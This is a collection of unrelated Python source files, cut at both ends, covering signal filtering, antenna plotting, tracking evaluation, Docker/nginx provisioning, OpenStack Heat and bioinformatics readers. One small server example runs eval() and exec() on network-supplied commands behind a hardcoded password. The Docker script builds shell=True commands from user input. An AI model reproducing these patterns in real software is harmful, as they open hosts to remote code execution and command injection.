__style = ( 'Blackman', 'Hamming', 'Hann', 'Kaiser' )
def __init__( self, style : str = '', frequency : float = 0.0, order : int = 0, count : int = 1, complement : bool = False, gain : float = 1.0,
b : Union[ List, numpy.ndarray ] = [ ], s : Union[ List, numpy.ndarray ] = [ ] ) -> None :
""" Initialize.
Specify constraints including style, frequency, and order.
Alternatively, a forward coefficient array may be explicitly defined
to ignore constraints.
Labels should be used to avoid ambiguity between constraints and
coefficients.
Arguments :
style : str - in ( 'Blackman', 'Hamming', 'Hann', 'Kaiser' ).
frequency : float - relative to Nyquist in ( 0.0, 1.0 ).
order : int.
count : int.
complement : bool.
gain : float.
b : Union[ List, numpy.ndarray ].
s : Union[ List, numpy.ndarray ].
"""
if ( not len( b ) ) :
if ( ( not style ) or ( style not in FirFilter.__style ) ) :
raise ValueError( f'style = {style}' )
if ( ( frequency <= 0.0 ) or ( frequency >= 1.0 ) ) :
raise ValueError( f'Frequency = {frequency}' )
if ( order < 0 ) :
raise ValueError( f'Order = {order}' )
if ( count <= 0 ) :
raise ValueError( f'Count = {count}' )
if ( complement ) :
frequency = 1.0 - frequency
if ( style == 'Kaiser' ) :
window = ( style.lower( ), 7.0 )
else :
window = style.lower( )
beta, eps, error = 10.0, numpy.finfo( float ).eps, float( 'inf' )
index, mu, zeta = 500 * ( 1 + ( count > 2 ) ), 2.5e-2, 1.0
for _ in range( 0, index ) :
with warnings.catch_warnings( ) :
warnings.simplefilter( 'ignore' )
v = scipy.signal.firwin( order + 1, zeta * frequency, None, window, True, True, 1.0 )
if ( numpy.isnan( v ).any( ) ) :
raise ValueError( f'V = {v}' )
x = numpy.exp( 1j * math.pi * frequency )
e = ( 2.0 ** ( -0.5 ) ) - ( abs( numpy.polyval( v, x ) ) ** count )
if ( abs( e ) < error ) :
b, error = v, abs( e )
if ( error < ( 10.0 * eps ) ) :
break
zeta = numpy.maximum( zeta + mu * math.tanh( beta * e ), eps )
if ( complement ) :
b *= numpy.array( [ ( ( -1.0 ) ** x ) for x in range( 0, len( b ) ) ] )
b /= sum( b * numpy.array( [ ( ( -1.0 ) ** x ) for x in range( 0, len( b ) ) ] ) )
b *= gain
if ( ( not numpy.isscalar( b ) ) and ( not isinstance( b, numpy.ndarray ) ) ) :
b = numpy.array( list( b ) )
if ( not len( b ) ) :
raise ValueError( f'B = {b}' )
if ( ( not numpy.isscalar( s ) ) and ( not isinstance( s, numpy.ndarray ) ) ) :
s = numpy.array( list( s ) )
if ( len( b ) < len( s ) ) :
b = numpy.concatenate( ( b, numpy.zeros( len( s ) - len( b ) ) ) )
if ( len( s ) < len( b ) ) :
s = numpy.concatenate( ( s, numpy.zeros( len( b ) - len( s ) ) ) )
super( ).__init__( )
self.b, self.s = numpy.array( b ), numpy.array( s, type( b[ 0 ] ) )
def delay( self, length : int = 8192, count : int = 1 ) -> Tuple[ numpy.ndarray, numpy.ndarray ] :
""" Estimates group delay and produces a reference signal.
Arguments :
length : int.
count : int.
Returns :
y : numpy.ndarray - reference signal.
f : numpy.ndarray - relative to Nyquist in [ -1.0, 1.0 ).
"""
if ( length <= 0 ) :
raise ValueError( f'Length = {length}' )
if ( count <= 0 ) :
raise ValueError( f'Count = {count}' )
with warnings.catch_warnings( ) :
warnings.simplefilter( 'ignore' )
y, f = scipy.signal.group_delay( ( self.b, [ 1.0 ] ), length, True )[ 1 ], numpy.linspace( -1.0, 1.0 - 2.0 / length, length )
y = numpy.concatenate( ( y[ len( y ) // 2 : ], y[ : len( y ) // 2 ] ) )
if ( length > 2 ) :
y[ 0 ] = y[ 1 ] * 2.0 - y[ 2 ]
return y, f
def filter( self, x : Union[ List, numpy.ndarray ] ) -> numpy.ndarray :
""" Filters an incident signal and produces a reference signal.
Arguments :
x : Union[ List, numpy.ndarray ] - incident signal.
Returns :
y : numpy.ndarray - reference signal.
"""
if ( ( not numpy.isscalar( x ) ) and ( not isinstance( x, numpy.ndarray ) ) ) :
x = numpy.array( list( x ) )
if ( not len( x ) ) :
raise ValueError( f'X = {x}' )
y = numpy.zeros( len( x ), type( self.b[ 0 ] ) )
for ii in range( 0, len( x ) ) :
self.s[ 0 ] = x[ ii ]
y[ ii ] = self.b.dot( self.s )
if ( len( self.s ) > 1 ) :
self.s[ 1 : ] = self.s[ : -1 ]
return y
def reset( self, x : Union[ complex, float ] ) -> None :
""" Modifies a state to minimize edge effects by assuming persistent
operation at a specified incident signal condition.
Arguments :
x : Union[ complex, float ] - incident signal.
"""
if ( not numpy.isscalar( x ) ) :
raise ValueError( f'X = {x}' )
self.s.fill( x )
def response( self, length = 8192, count = 1 ) -> Tuple[ numpy.ndarray, numpy.ndarray ] :
""" Estimates frequency response and produces a reference signal.
Arguments :
length : int.
count : int.
Returns :
y : numpy.ndarray - reference signal.
f : numpy.ndarray - relative to Nyquist in [ -1.0, 1.0 ).
"""
if ( length <= 0 ) :
raise ValueError( f'Length = {length}' )
if ( count <= 0 ) :
raise ValueError( f'Count = {count}' )
y, f = scipy.signal.freqz( self.b, [ 1.0, 0.0 ], length, True )[ 1 ], numpy.linspace( -1.0, 1.0 - 2.0 / length, length )
y = numpy.concatenate( ( y[ len( y ) // 2 : ], y[ : len( y ) // 2 ] ) ) ** count
return y, f
def roots( self, count = 1 ) -> Tuple[ numpy.ndarray, numpy.ndarray ] :
""" Estimates roots of a frequency response in poles and zeros.
Arguments :
count : int.
Returns :
p : numpy.ndarray - poles.
z : numpy.ndarray - zeros.
"""
z = numpy.tile( numpy.roots( self.b ), count )
return numpy.zeros( count * ( len( self.b ) - 1 ) ), z[ numpy.argsort( abs( z ) ) ]
|
'''
Antenna array gain
===========================
'''
import time
import numpy as np
import pyant
xv, yv = np.meshgrid(np.linspace(-50,50, num=22), np.linspace(-50,50, num=22))
antennas = np.zeros((22**2, 3))
antennas[:,0] = xv.flatten()
antennas[:,1] = yv.flatten()
ant = pyant.Array(
azimuth=0,
elevation=90.0,
frequency=46.5e6,
antennas=antennas,
)
## Uncomment these to try the speed up for more complex gain calculations
# start_time = time.time()
# pyant.plotting.gain_heatmap(ant, resolution=100, min_elevation=80.0, vectorized=False)
# print(f'"gain_heatmap" ({100**2}) loop performance: {time.time() - start_time:.1e} seconds')
# start_time = time.time()
# pyant.plotting.gain_heatmap(ant, resolution=100, min_elevation=80.0, vectorized=True)
# print(f'"gain_heatmap" ({100**2}) vectorized performance: {time.time() - start_time:.1e} seconds')
pyant.plotting.gain_heatmap(ant, resolution=100, min_elevation=80.0)
pyant.plotting.show()
|
"""
App Messages Enum Module for Flambda APP
Version: 1.0.0
"""
from enum import IntEnum
class MessagesEnum(IntEnum):
def __new__(cls, value, label, message=''):
obj = int.__new__(cls, value)
obj._value_ = value
obj.code = value
obj.label = label
obj.message = message
return obj
# Common messages 1-10
OK = 1, 'common.success', 'Success'
NOK = 2, 'common.error.nok', '%s'
REQUEST_ERROR = 3, 'common.error.request_error', '%s'
UNSUPPORTED_MEDIA_TYPE_ERROR = 4, 'common.error.unsupported_media_type_error', \
'Unsupported media type: %s, supported types are (%s)'
METHOD_NOT_IMPLEMENTED_ERROR = 5, 'common.error.method_not_implemented_error', 'Method not implemented yet'
UNKNOWN_ERROR = 6, 'common.error.unknown_error', 'Unknown error'
INTERNAL_SERVER_ERROR = 7, 'common.error.internal_server_error', 'Internal Server Error'
# Request errors 11 - 30
LIST_ERROR = 11, 'common.error.list_error', 'Unable to return the list data, please review your request'
FILTERS_ERROR = 12, 'common.error.filters_error', 'Filters must be informed'
PARAM_REQUIRED_ERROR = 13, 'common.error.param_required_error', 'Parameter %s is required'
FIND_ERROR = 14, 'common.error.find_error', 'Unable to find the record'
INVALID_FILTER_ERROR = 15, 'common.error.invalid_filter_error', 'Invalid filter in request'
INVALID_FIELD_FILTER_ERROR = 16, 'common.error.invalid_filter_error', \
'Invalid filter value (%s) for filter (%s). Expected (%s)'
CREATE_ERROR = 17, 'common.error.create_error', 'Unable to create the record'
UPDATE_ERROR = 18, 'common.error.update_error', 'Unable to update the record'
DELETE_ERROR = 18, 'common.error.delete_error', 'Unable to delete the record'
SOFT_DELETE_ERROR = 18, 'common.error.soft_delete_error', 'Unable to disable the record'
# validation 31 - 50
VALIDATION_ERROR = 31, 'common.error.validation_error', 'Validation error, please review your params: value (%s) for param (%s)'
INVALID_ISO_DATE_ERROR = 32, 'common.error.invalid_iso_date', 'Invalid iso date value (%s) for param (%s)'
# Database errors 51 - 100
QUERY_ERROR = 51, 'common.error.query_error', 'Unable to execute the query'
INVALID_ENTITY_ID = 52, 'common.error.invalid_entity_id', 'Unable to find the entity'
ENTITY_DELETION_SUCCESS = 53, 'common.entity_deletion_success', 'Entity deleted with success'
# Events 101 - 200
EVENT_NOT_REGISTERED_ERROR = 101, 'common.error.event_not_registered_error', 'Event not registered'
EVENT_REGISTERED_WITH_SUCCESS = 102, 'common.event_registered_with_success', 'Event registered with success'
EVENT_NOT_SENT_ERROR = 103, 'common.error.event_not_sent_error', 'Event not sent'
EVENT_ALREADY_REGISTERED_ERROR = 104, 'common.error.event_already_registered_error', 'Event already registered'
EVENT_TYPE_UNKNOWN_ERROR = 105, 'common.error.event_type_unknown_error', 'Event type unknown: (%s)'
# Others 201 - 300
MAPPING_ERROR = 201, 'common.error.mapping_error', 'Unable to mapping the data'
UNMAPPING_ERROR = 202, 'common.error.unmapping_error', 'Unable to unmapping the data'
|
import frappe
def get_context(context):
context.test="Hello"
|
from __future__ import print_function
import pandas
import matplotlib; matplotlib.use('Agg')
import sys, os, copy, math, numpy as np, matplotlib.pyplot as plt
from tabulate import tabulate
from munkres import Munkres
from collections import defaultdict
try:
from ordereddict import OrderedDict # can be installed using pip
except:
from collections import OrderedDict # only included from python 2.7 on
import mailpy
from box_util import boxoverlap, box3doverlap
from evaluate_kitti3dmot_model import *
def run(*argv):
"""
Parameters:
argv = [signture, dir ,"3D/2D","Baseline","Your model*", subfolder, sequence]
signture:
3D/2D:
df: pandas table
into which results are going to be inserted.
Your model/*: name of your model
must match the folder where the results are stored.
Add * at the end if tracked obejects are not in different
subfolders
subfolder: (optional)
to store in a subfoler
"""
num_sample_pts = 41.0
# check for correct number of arguments. if user_sha and email are not supplied,
# no notification email is sent (this option is used for auto-updates)
if len(argv)<5:
print("Usage: python eval_kitti3dmot.py result_sha ?D(e.g. 2D or 3D)")
sys.exit(1);
# get unique sha key of submitted results
result_sha = argv[0]
obj_tracked = result_sha.split("_")[0]
dir = argv[1]
dt_typ= result_sha.split("_")[3]
df = argv[3]
mail = mailpy.Mail("")
D = argv[2]
#
if argv[2] == '2D':
eval_3diou, eval_2diou = False, True # eval 2d
elif argv[2] == '3D':
eval_3diou, eval_2diou = True, False # eval 3d
else:
print("Usage: python eval_kitti3dmot.py result_sha ?D(e.g. 2D or 3D)")
sys.exit(1);
# evaluate results
other_name = argv[4]
mail = mailpy.Mail("")
print("Evaluating "+dir +" :")
if len(argv) >5:
last_arg = argv[-1]
else:
last_arg =None
success, other_model, om_avgs = evaluate(result_sha, dir, other_name, mail,eval_3diou,eval_2diou, last_arg)
new_row = [dir,other_model.sMOTA, other_model.MOTA, other_model.MOTP, other_model.MT, other_model.ML, other_model.id_switches, other_model.fragments, \
other_model.F1, other_model.precision, other_model.recall, other_model.FAR, other_model.tp, other_model.fp, other_model.fn,\
om_avgs[0], om_avgs[1], om_avgs[2]]
df.loc[len(df.index)] = new_row
return other_model.MOTA, other_model.MOTP, df
if __name__ == "__main__":
run()
|
#!/usr/bin/python3
# Credit https://github.com/oskarhane/dockerpress Written by Oskar Hane <oh@oskarhane.com>
# Credit http://geraldkaszuba.com/quickly-ssh-into-a-docker-container/
import subprocess
import sys
import re
import shutil
import json
from optparse import OptionParser
def create_nginx_config(container_id):
command = ["docker ps | grep " + container_id[:6]]
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
d_str = output.decode("utf-8")
p.stdout.close()
domain = re.findall('\s([\S]+)\s*$', d_str)
port = get_docker_port(container_id[:6],80)
if not(port):
return 'Port 80 not open'
print ('{0} {1} {2}'.format(container_id[:6], domain[0], port))
conf_test = write_and_test_nginx_config(container_id[:6], domain[0], port)
if not(conf_test):
return 'Error in Nginx config. Check file.'
return True
#Expected response Testing nginx configuration: nginx.
def write_and_test_nginx_config(container_id, url, port):
conf_dir = '/etc/nginx/sites-enabled/'
fail_dir = '/etc/nginx/sites-available/'
conf_str = get_nginx_conf(container_id, url, port)
f = open(conf_dir + url, 'w+')
f.write(conf_str)
f.close()
test_command = ["/etc/init.d/nginx configtest"]
p_ok = subprocess.Popen(test_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
ok_output, err = p_ok.communicate()
err_response = err.decode("utf-8")
p_ok.stdout.close()
p_ok.stderr.close()
if not(re.search('(failed)', err_response)):
return True
else:
shutil.move(conf_dir + url, fail_dir + url)
return False
def get_port_from_address(address):
port = re.search(':([0-9]+)\s*$', address).group(1)
return port
def get_nginx_conf(container_id, url, http_port):
listen_str = 'upstream ' + container_id + " {\n"
listen_str += "\tserver 127.0.0.1:" + http_port + ";\n}\n"
listen_str += 'server {\n'
listen_str += "\tlisten 80;\n"
listen_str += "\tserver_name " + url + ";\n"
listen_str += "\tlocation / {\n"
listen_str += "\t\tproxy_pass http://" + container_id + ";\n"
listen_str += "\t\tproxy_set_header X-Real-IP $remote_addr;\n"
listen_str += "\t\tproxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;\n"
listen_str += "\t\tproxy_set_header X-NginX-Proxy true;\n"
listen_str += "\t\tproxy_set_header Host $host;\n"
listen_str += "\t\tproxy_redirect off;\n"
listen_str += "\t}\n"
listen_str += "}"
return listen_str
def create_docker_action(options):
if not (options.url):
parser.error("You must provide a URL to create a site for")
if not (re.search('^([a-z0-9\.-]+\.[a-z]{2,4})$', options.url)):
parser.error('The given url is not a valid domain')
create_project_specifc_dockerfile(options.project_code,options.maintainer)
image_tag = create_docker_project_image(options.project_code)
container_id = create_docker_container(options.url, image_tag)
print ("Container created: {0}".format(container_id))
nginx_conf = create_nginx_config(container_id)
if(nginx_conf == True):
print('All ok, you can safetly reload nginx now. service nginx reload')
else:
print('Nginx config failed. Please check file /etc/nginx/sites-available/' + options.url)
print (nginx_conf)
def get_docker_port(container_id,container_port):
command = ['docker port {} {}'.format(container_id,container_port)]
output = subprocess.check_output(command, shell=True).decode('utf-8')
#subprocess.stdout.close()
return get_port_from_address(output)
def create_project_specifc_dockerfile(project_code,maintainer):
dockerfile_content = """
FROM {image}
MAINTAINER {maintainer}
ENV PROJECT_CODE {project_code}
ADD ./id_rsa_$PROJECT_CODE.pub /root/.ssh/
ADD ./supervisord.conf /etc/supervisor/conf.d/supervisord.conf
RUN cat /root/.ssh/id_rsa_$PROJECT_CODE.pub >> /root/.ssh/authorized_keys
RUN chmod 600 /root/.ssh/authorized_keys
RUN echo "$PROJECT_CODE" >>/home/index.html
CMD ["/usr/bin/supervisord"]
""".format(project_code=project_code,image="open-platform-hk/bootstrap:0.1", maintainer=maintainer)
print ("result dockerfile:")
print (dockerfile_content)
##Docker don't support other file name while with context
target=open ("Dockerfile",'w')
target.write(dockerfile_content)
target.close
def create_docker_project_image(project_code):
tag = project_code+":0.1"
command = ["docker build -t {tag} .".format(tag=tag)]
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
container_id = output.decode("utf-8")
p.stdout.close()
return tag
def create_docker_container(url,image_tag):
image = image_tag
command = ["docker run -d -t -i -p 80 -p 22 --name '{url}' {image}".format( url=url,image=image)]
p = subprocess.Popen(command, stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=True)
output, err = p.communicate()
container_id = output.decode("utf-8")
##TODO err handling
p.stderr.close()
p.stdout.close()
return container_id
if __name__ == "__main__":
usage = "usage: %prog [options]"
parser = OptionParser(usage=usage)
parser.add_option("--code", dest="project_code", help="Project Code to create a site for.")
parser.add_option("--id", dest="container_id", help="Container id to ssh.")
parser.add_option("--action", dest="action", help="Action")
parser.add_option("--maintainer", dest="maintainer", help="Maintainer")
options, args = parser.parse_args()
options.url = '{project_code}.dev.code4.hk'.format(project_code=options.project_code)
if not (options.maintainer):
options.maintainer='code4hk@gmail.com'
if (options.action == 'ssh'):
print (get_docker_port(options.container_id,22))
else:
create_docker_action(options)
|
from cardboard import types
from cardboard.ability import (
AbilityNotImplemented, spell, activated, triggered, static
)
from cardboard.cards import card, common, keywords, match
@card("Beast Hunt")
def beast_hunt(card, abilities):
def beast_hunt():
return AbilityNotImplemented
return beast_hunt,
@card("Kor Sanctifiers")
def kor_sanctifiers(card, abilities):
def kor_sanctifiers():
return AbilityNotImplemented
def kor_sanctifiers():
return AbilityNotImplemented
return kor_sanctifiers, kor_sanctifiers,
@card("Whiplash Trap")
def whiplash_trap(card, abilities):
def whiplash_trap():
return AbilityNotImplemented
def whiplash_trap():
return AbilityNotImplemented
return whiplash_trap, whiplash_trap,
@card("Hideous End")
def hideous_end(card, abilities):
def hideous_end():
return AbilityNotImplemented
return hideous_end,
|
from MultiSC.MultiServer.quick_setup.manager import (
ProtocolsManager,
MonitorManager,
Runner,
)
# Simple protocol that run python command
@ProtocolsManager.add("run_command", "command")
def func(query):
if query["password"] != "runpass12345665":
return "password wrong!"
try:
return eval(query["command"])
except:
pass
try:
exec(query["command"])
return "command success"
except:
pass
return "command faild"
Server = Runner()
Server.run()
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.octavia import octavia_base
from heat.engine import support
from heat.engine import translation
class Pool(octavia_base.OctaviaBase):
"""A resource for managing Octavia Pools.
This resources manages octavia LBaaS Pools, which represent a group
of nodes. Pools define the subnet where nodes reside, balancing algorithm,
and the nodes themselves.
"""
PROPERTIES = (
ADMIN_STATE_UP, DESCRIPTION, SESSION_PERSISTENCE, NAME,
LB_ALGORITHM, LISTENER, LOADBALANCER, PROTOCOL,
SESSION_PERSISTENCE_TYPE, SESSION_PERSISTENCE_COOKIE_NAME,
TLS_ENABLED,
) = (
'admin_state_up', 'description', 'session_persistence', 'name',
'lb_algorithm', 'listener', 'loadbalancer', 'protocol',
'type', 'cookie_name', 'tls_enabled',
)
SESSION_PERSISTENCE_TYPES = (
SOURCE_IP, HTTP_COOKIE, APP_COOKIE
) = (
'SOURCE_IP', 'HTTP_COOKIE', 'APP_COOKIE'
)
SUPPORTED_PROTOCOLS = (TCP, HTTP, HTTPS, TERMINATED_HTTPS, PROXY, UDP) = (
'TCP', 'HTTP', 'HTTPS', 'TERMINATED_HTTPS', 'PROXY', 'UDP')
ATTRIBUTES = (
HEALTHMONITOR_ID_ATTR, LISTENERS_ATTR, MEMBERS_ATTR
) = (
'healthmonitor_id', 'listeners', 'members'
)
properties_schema = {
ADMIN_STATE_UP: properties.Schema(
properties.Schema.BOOLEAN,
_('The administrative state of this pool.'),
default=True,
update_allowed=True
),
DESCRIPTION: properties.Schema(
properties.Schema.STRING,
_('Description of this pool.'),
update_allowed=True,
default=''
),
SESSION_PERSISTENCE: properties.Schema(
properties.Schema.MAP,
_('Configuration of session persistence.'),
schema={
SESSION_PERSISTENCE_TYPE: properties.Schema(
properties.Schema.STRING,
_('Method of implementation of session '
'persistence feature.'),
required=True,
constraints=[constraints.AllowedValues(
SESSION_PERSISTENCE_TYPES
)]
),
SESSION_PERSISTENCE_COOKIE_NAME: properties.Schema(
properties.Schema.STRING,
_('Name of the cookie, '
'required if type is APP_COOKIE.')
)
},
update_allowed=True,
),
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of this pool.'),
update_allowed=True
),
LB_ALGORITHM: properties.Schema(
properties.Schema.STRING,
_('The algorithm used to distribute load between the members of '
'the pool.'),
required=True,
constraints=[
constraints.AllowedValues(['ROUND_ROBIN', 'LEAST_CONNECTIONS',
'SOURCE_IP', 'SOURCE_IP_PORT']),
],
update_allowed=True,
),
LISTENER: properties.Schema(
properties.Schema.STRING,
_('Listener name or ID to be associated with this pool.'),
constraints=[
constraints.CustomConstraint('octavia.listener')
]
),
LOADBALANCER: properties.Schema(
properties.Schema.STRING,
_('Loadbalancer name or ID to be associated with this pool.'),
constraints=[
constraints.CustomConstraint('octavia.loadbalancer')
],
),
PROTOCOL: properties.Schema(
properties.Schema.STRING,
_('Protocol of the pool.'),
required=True,
constraints=[
constraints.AllowedValues(SUPPORTED_PROTOCOLS),
]
),
TLS_ENABLED: properties.Schema(
properties.Schema.BOOLEAN,
_('Enable backend member re-encryption.'),
default=False,
update_allowed=True,
support_status=support.SupportStatus(version='14.0.0'),
),
}
attributes_schema = {
HEALTHMONITOR_ID_ATTR: attributes.Schema(
_('ID of the health monitor associated with this pool.'),
type=attributes.Schema.STRING
),
LISTENERS_ATTR: attributes.Schema(
_('Listener associated with this pool.'),
type=attributes.Schema.STRING
),
MEMBERS_ATTR: attributes.Schema(
_('Members associated with this pool.'),
cache_mode=attributes.Schema.CACHE_NONE,
type=attributes.Schema.LIST
),
}
def translation_rules(self, props):
return [
translation.TranslationRule(
props,
translation.TranslationRule.RESOLVE,
[self.LISTENER],
client_plugin=self.client_plugin(),
finder='get_listener',
),
translation.TranslationRule(
props,
translation.TranslationRule.RESOLVE,
[self.LOADBALANCER],
client_plugin=self.client_plugin(),
finder='get_loadbalancer',
),
]
def _prepare_args(self, properties):
props = dict((k, v) for k, v in properties.items() if v is not None)
if self.NAME not in props:
props[self.NAME] = self.physical_resource_name()
if self.LISTENER in props:
props['listener_id'] = props.pop(self.LISTENER)
if self.LOADBALANCER in props:
props['loadbalancer_id'] = props.pop(self.LOADBALANCER)
self._prepare_session_persistence(props)
return props
def _prepare_session_persistence(self, props):
session_p = props.get(self.SESSION_PERSISTENCE)
if session_p is not None:
session_props = dict(
(k, v) for k, v in session_p.items() if v is not None)
props[self.SESSION_PERSISTENCE] = session_props
def validate(self):
super(Pool, self).validate()
if (self.properties[self.LISTENER] is None and
self.properties[self.LOADBALANCER] is None):
raise exception.PropertyUnspecifiedError(self.LISTENER,
self.LOADBALANCER)
if self.properties[self.SESSION_PERSISTENCE] is not None:
session_p = self.properties[self.SESSION_PERSISTENCE]
persistence_type = session_p[self.SESSION_PERSISTENCE_TYPE]
if persistence_type == self.APP_COOKIE:
if not session_p.get(self.SESSION_PERSISTENCE_COOKIE_NAME):
msg = (_('Property %(cookie)s is required when %(sp)s '
'type is set to %(app)s.') %
{'cookie': self.SESSION_PERSISTENCE_COOKIE_NAME,
'sp': self.SESSION_PERSISTENCE,
'app': self.APP_COOKIE})
raise exception.StackValidationFailed(message=msg)
elif persistence_type == self.SOURCE_IP:
if session_p.get(self.SESSION_PERSISTENCE_COOKIE_NAME):
msg = (_('Property %(cookie)s must NOT be specified when '
'%(sp)s type is set to %(ip)s.') %
{'cookie': self.SESSION_PERSISTENCE_COOKIE_NAME,
'sp': self.SESSION_PERSISTENCE,
'ip': self.SOURCE_IP})
raise exception.StackValidationFailed(message=msg)
def _resource_create(self, properties):
return self.client().pool_create(json={'pool': properties})['pool']
def _resource_update(self, prop_diff):
props = dict((k, v) for k, v in prop_diff.items() if v is not None)
self._prepare_session_persistence(props)
self.client().pool_set(self.resource_id, json={'pool': props})
def _resource_delete(self):
self.client().pool_delete(self.resource_id)
def _show_resource(self):
return self.client().pool_show(self.resource_id)
def resource_mapping():
return {
'OS::Octavia::Pool': Pool,
}
|
import os
import csv
from datetime import datetime
from collections import namedtuple
from codonutils import translate_codon
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
with open(os.path.join(ROOT, 'internalFiles', 'consensus.csv')) as fp:
CONSENSUS = {c['Gene']: c for c in csv.DictReader(fp)}
class MutPrevalence:
def __init__(self, data):
self._data = data
@property
def gene(self):
return self._data['Gene']
@property
def position(self):
return int(self._data['Pos'])
@property
def aa(self):
return self._data['aa']
@property
def percent(self):
return float(self._data['Pcnt'])
@property
def count(self):
return int(self._data['Count'])
@property
def total(self):
return int(self._data['PosTotal'])
PREVALENCE = None
def refresh_prevalence():
global PREVALENCE
PREVALENCE = {}
for _gene in ('gag', 'gp41'):
with open(os.path.join(
ROOT, 'data', 'naiveStudies',
'{}AAPrevalence.csv'.format(_gene))) as fp:
for p in csv.DictReader(fp):
if p['Subtype']:
continue
_aa = (p['AA']
.replace('ins', 'i')
.replace('del', 'd'))
PREVALENCE[
(p['Gene'], int(p['Pos']), _aa)] = MutPrevalence(p)
def get_prevalence(gene, pos, aa):
if not PREVALENCE:
refresh_prevalence()
prev = PREVALENCE.get((gene, pos, aa))
if prev is None:
return .0
else:
return prev.percent
class Codon(namedtuple('Codon', ['position', 'gene',
'triplet', 'cons_aa'])):
@property
def aa(self):
if self.triplet == '---':
return '-'
return translate_codon(self.triplet)
@property
def is_mutation(self):
return self.aa != self.cons_aa
@property
def is_deletion(self):
return self.aa != '-'
@property
def prevalence(self):
return get_prevalence(self.gene, self.position, self.aa)
class Sequence:
def __init__(self, seqdata):
self._data = seqdata
@property
def pid(self):
return self._data['PID']
@property
def time_point(self):
return self._data['TimePoint']
@property
def date(self):
return datetime.strptime(self._data['Date'], '%Y-%m-%d').date()
@property
def gene(self):
return self._data['Gene']
@property
def first_aa(self):
return int(self._data['FirstAA'])
@property
def last_aa(self):
return int(self._data['LastAA'])
@property
def na_sequence(self):
return self._data['NASequence']
def iter_codons(self, start_aa=None, end_aa=None, frameshift=0):
cons = CONSENSUS[self.gene]['AASeq']
fs = frameshift
for i in range(0, self.last_aa - self.first_aa + 1):
aa_pos = i + self.first_aa
if (start_aa and aa_pos < start_aa) or \
(end_aa and aa_pos > end_aa):
continue
triplet = self.na_sequence[i * 3 + fs:i * 3 + 3 + fs]
cons_aa = cons[aa_pos - 1]
yield Codon(
position=aa_pos,
gene=self.gene,
triplet=triplet,
cons_aa=cons_aa)
class Sample:
def __init__(self, sample_data):
self._data = sample_data
@property
def pid(self):
return self._data['PID']
@property
def time_point(self):
return self._data['TimePoint']
@property
def date(self):
return datetime.strptime(self._data['Date'], '%Y-%m-%d').date()
@property
def category(self):
return self._data['Category']
def data_reader(filepath, decorator=dict, filter_func=None, delimiter=','):
with open(filepath) as fp:
bom = fp.read(1)
if bom != '\ufeff':
fp.seek(0)
items = csv.DictReader(fp, delimiter=delimiter)
for item in items:
item = decorator(item)
if not filter_func or filter_func(item):
yield item
def sequence_reader(filter_func=None):
return data_reader(
os.path.join(ROOT, 'internalFiles', 'sequences.csv'),
Sequence, filter_func)
def possible_apobecs_reader(gene, filter_func=None):
filename = os.path.join(
ROOT, 'data', 'naiveStudies', 'apobec',
'{}PossibleApobecs.csv'.format(gene.lower())
)
if not os.path.exists(filename):
return []
return data_reader(
filename,
filter_func=filter_func
)
def sample_reader(filter_func=None):
return data_reader(
os.path.join(ROOT, 'internalFiles', 'samples.csv'),
Sample, filter_func)
def naive_sequence_reader(gene, filter_func=None):
return data_reader(
os.path.join(
ROOT, 'internalFiles', 'naiveStudies',
'{}.csv'.format(gene.lower())),
filter_func=filter_func)
def fasta_reader(gene, rx):
filename = os.path.join(
ROOT, 'internalFiles', 'fasta', '{}{}.aln.fasta.txt'.format(gene, rx))
return any_fasta_reader(filename)
def any_fasta_reader(filename):
with open(filename) as fp:
header = None
seq = []
for line in fp:
if line.startswith('#'):
continue
elif line.startswith('>'):
if seq:
yield header, ''.join(seq)
header = line[1:].strip()
seq = []
else:
seq.append(line.strip())
if seq:
yield header, ''.join(seq)
|
# -*- coding: utf-8 -*-
from wikiedits.diff_finder import DiffFinder
import nltk.data
import Levenshtein
import math
import logging
log = logging.getLogger(__name__)
class EditFilter(object):
def __init__(self,
lang='english',
min_words=3,
max_words=120,
length_diff=4,
edit_ratio=0.3,
min_chars=10):
self.segmenter = nltk.data.load('tokenizers/punkt/%s.pickle' % lang)
self.LEVENSHTEIN_RATIO_LOG_BASE = 20
self.MIN_TEXT_LENGTH = min_chars # in characters
self.MIN_WORDS_IN_SENTENCE = min_words # in words
self.MAX_WORDS_IN_SENTENCE = max_words # in words
self.MAX_LENGTH_DIFF = length_diff # on words
self.MAX_LEVENSHTEIN_RATIO = edit_ratio # on words
def filter_edits(self, old_text, new_text):
log.debug("processing texts:\n >>> %s\n >>> %s", old_text, new_text)
if not self.__looks_like_text_edition(old_text, new_text):
return []
edits = []
for old_sent, new_sent in self.__sentence_pairs(old_text, new_text):
old_sent = old_sent.strip()
new_sent = new_sent.strip()
log.info("processing sentences:\n > %s\n > %s",
old_sent, new_sent)
scores = self.__looks_like_sentence_edition(old_sent, new_sent)
if not scores:
continue
edits.append((old_sent, new_sent, scores))
log.info("got %i edited sentence(s)", len(edits))
return edits
def __looks_like_text_edition(self, old_text, new_text):
if not old_text or not new_text:
log.debug("either old or new text fragment is empty")
return False
if old_text == new_text:
log.debug("texts are equal")
return False
if len(old_text) < self.MIN_TEXT_LENGTH \
or len(new_text) < self.MIN_TEXT_LENGTH:
log.debug("either old or new text fragment is too short")
return False
return True
def __looks_like_sentence_edition(self, old_sent, new_sent):
if old_sent == new_sent:
log.info("sentences are equal")
return False
# the number of words in a sentence is obtained by counting the number
# of spaces plus one
counts = [old_sent.count(' ') + 1, new_sent.count(' ') + 1]
diff = abs(counts[0] - counts[1])
if diff > self.MAX_LENGTH_DIFF:
log.info("too large difference in number of words %i", diff)
return False
if min(counts) < self.MIN_WORDS_IN_SENTENCE:
